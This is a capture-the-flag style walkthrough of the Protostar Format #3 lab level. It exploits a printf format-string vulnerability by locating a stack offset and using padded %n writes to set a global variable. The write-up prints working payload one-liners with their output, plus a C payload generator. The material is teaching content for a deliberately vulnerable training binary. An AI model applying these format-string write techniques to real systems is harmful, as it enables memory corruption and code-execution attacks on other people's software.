Monday, December 22, 2014

Protostar - Format #3


About:

This level advances from format2 and shows how to write more than 1 or 2 bytes of memory to the process. This also teaches you to carefully control what data is being written to the process memory.

Source Code:



Solution:

This one looks very similar to the previous one, except that the printf call now sits in a separate function and the value target must be set to is much larger than before (0x01025544: the last two runs below show a count of 0x01025543 failing and one byte more succeeding).

We start out the same way as before, getting the location of target in memory:

user@protostar:/opt/protostar/bin$ objdump -t ./format3 | grep "target"
080496f4 g     O .bss    00000004              target


Then we figure out how many argument slots up the stack our input sits (same method as before):

user@protostar:/opt/protostar/bin$ python -c "print 'AAAAAAAA' + '%08x.'*10" | ./format3
AAAAAAAA00000000.bffff5d0.b7fd7ff4.00000000.00000000.bffff7d8.0804849d.bffff5d0.00000200.b7fd8420.
target is 00000000 :(

user@protostar:/opt/protostar/bin$ python -c "print 'AAAAAAAA' + '%08x.'*100" | ./format3 
AAAAAAAA00000000.bffff5d0.b7fd7ff4.00000000.00000000.bffff7d8.0804849d.bffff5d0.00000200.b7fd8420.bffff614.41414141.41414141.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.
target is 00000000 :(

There it is! The 41414141 shows up as the 12th value printed, so the start of our buffer is the 12th "argument" printf pulls off the stack.

Now let's zero in on it:

user@protostar:/opt/protostar/bin$ python -c "print 'AAAA' + '%08x.'*11 + '%08x'" | ./format3
AAAA00000000.bffff5d0.b7fd7ff4.00000000.00000000.bffff7d8.0804849d.bffff5d0.00000200.b7fd8420.bffff614.41414141
target is 00000000 :(


Ok, now let's replace the As with the address of target (0x080496f4, written little-endian as \xf4\x96\x04\x08; it contains no NUL byte, so the whole input survives as a string) and get ready to swap the 12th %x for a %n to trigger a write:

user@protostar:/opt/protostar/bin$ python -c "print '\xf4\x96\x04\x08' + '%08x.'*11 + '%08x'" | ./format3
?00000000.bffff5d0.b7fd7ff4.00000000.00000000.bffff7d8.0804849d.bffff5d0.00000200.b7fd8420.bffff614.080496f4
target is 00000000 :(


Ok, now let's trigger the write and see what happens:

user@protostar:/opt/protostar/bin$ python -c "print '\xf4\x96\x04\x08' + '%08x.'*11 + '%n'" | ./format3
?00000000.bffff5d0.b7fd7ff4.00000000.00000000.bffff7d8.0804849d.bffff5d0.00000200.b7fd8420.bffff614.
target is 00000067 :(


Looks good! We're hitting the target, just with the wrong value: %n stores the number of bytes printed so far, and 0x67 = 103 is exactly the 4 address bytes plus 11 x 9 bytes of "%08x." output.

Since %n stores the byte count, we need 0x01025544 = 16930116 bytes printed before it. Padding each of the 11 %x conversions to a width of 1539100 gives 4 + 11 x (1539100 + 1) = 16930115 = 0x01025543, one short, so a single literal space makes up the difference. Each run dumps about 16 MB of padding to stdout, hence the | tail -n 1:

user@protostar:/opt/protostar/bin$ python -c "print '\xf4\x96\x04\x08' + '%1539100x.'*11 + '%n'" | ./format3 | tail -n 1
target is 01025543 :(

user@protostar:/opt/protostar/bin$ python -c "print '\xf4\x96\x04\x08' + ' ' + '%1539100x.'*11 + '%n'" | ./format3 | tail -n 1
you have modified the target :)

There we go!
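The width arithmetic above is easy to get off by one, so here is the same payload construction as a small C generator. This is an added example, not code from the original post or from Protostar: the function names width_for, pad_for, build_payload and counter_at_n are mine, the address 0x080496f4 and the 12-slot offset (11 %x conversions before the %n) are taken from the runs above, and the target value 0x01025544 is inferred from the last two runs (0x01025543 fails, one byte more passes). counter_at_n reproduces what printf's byte counter holds at the %n by using a read-only format with `*` widths and snprintf(NULL, 0, ...), which counts without writing anything, so it can be checked on any machine without the vulnerable binary.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constants taken from the writeup (assumed to match the format3 binary). */
#define NCONV 11                 /* "%<w>x." conversions that consume stack slots 1..11 */
#define ADDR "\xf4\x96\x04\x08"  /* &target = 0x080496f4, little-endian, no NUL bytes */
#define ADDR_LEN 4
#define WANT 0x01025544UL        /* count the %n must store (0x01025543 failed, +1 passed) */

/* Field width w such that ADDR_LEN + pad + NCONV*(w+1) == want, where pad
 * (0..NCONV-1) literal spaces absorb the remainder. Every stack value dumped
 * here is at most 8 hex digits, so "%<w>x." really prints w+1 bytes. */
unsigned long width_for(unsigned long want)
{
    return (want - ADDR_LEN) / NCONV - 1;
}

/* Literal spaces needed after the address to land exactly on want. */
unsigned pad_for(unsigned long want)
{
    unsigned long w = width_for(want);
    return (unsigned)((want - ADDR_LEN) - NCONV * (w + 1));
}

/* Same bytes the python one-liner produced: address, spaces, NCONV x "%<w>x.", "%n". */
char *build_payload(unsigned long want)
{
    unsigned long w = width_for(want);
    unsigned pad = pad_for(want);
    size_t cap = ADDR_LEN + pad + NCONV * 32 + 4;   /* generous upper bound */
    char *p = malloc(cap);
    if (!p)
        return NULL;
    memcpy(p, ADDR, ADDR_LEN);
    size_t off = ADDR_LEN;
    memset(p + off, ' ', pad);
    off += pad;
    for (int i = 0; i < NCONV; i++)
        off += (size_t)snprintf(p + off, cap - off, "%%%lux.", w);
    snprintf(p + off, cap - off, "%%n");              /* the write itself */
    return p;
}

/* Value printf's byte counter holds when it reaches the %n, i.e. what gets
 * stored in target. The format is a read-only literal and the widths are
 * passed with '*', so this is an ordinary, safe printf call. */
unsigned long counter_at_n(unsigned long want)
{
    int w = (int)width_for(want);
    int pad = (int)pad_for(want);
    int n = 0;
    snprintf(NULL, 0,
             "%s%*s%*x.%*x.%*x.%*x.%*x.%*x.%*x.%*x.%*x.%*x.%*x.%n",
             ADDR, pad, "",
             w, 0, w, 0, w, 0, w, 0, w, 0, w, 0, w, 0, w, 0, w, 0, w, 0, w, 0,
             &n);
    return (unsigned long)n;
}

int main(void)
{
    char *payload = build_payload(WANT);
    if (!payload)
        return 1;
    fprintf(stderr, "width=%lu pad=%u counter at %%n=0x%08lx\n",
            width_for(WANT), pad_for(WANT), counter_at_n(WANT));
    /* Feed this to the level exactly like the python one-liner:
     *   ./gen | ./format3 | tail -n 1      (gen = whatever you named this binary) */
    fputs(payload, stdout);
    fputc('\n', stdout);
    free(payload);
    return 0;
}
```

Two caveats a practitioner will want: %n writes a full int, which is why one write suffices for the 4-byte target, and the price of a single write is the ~16 MB of padding that the counter has to climb through. Splitting the value into two %hn writes keeps output tiny, but needs a second address in the buffer and a different slot layout, which this example does not attempt.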
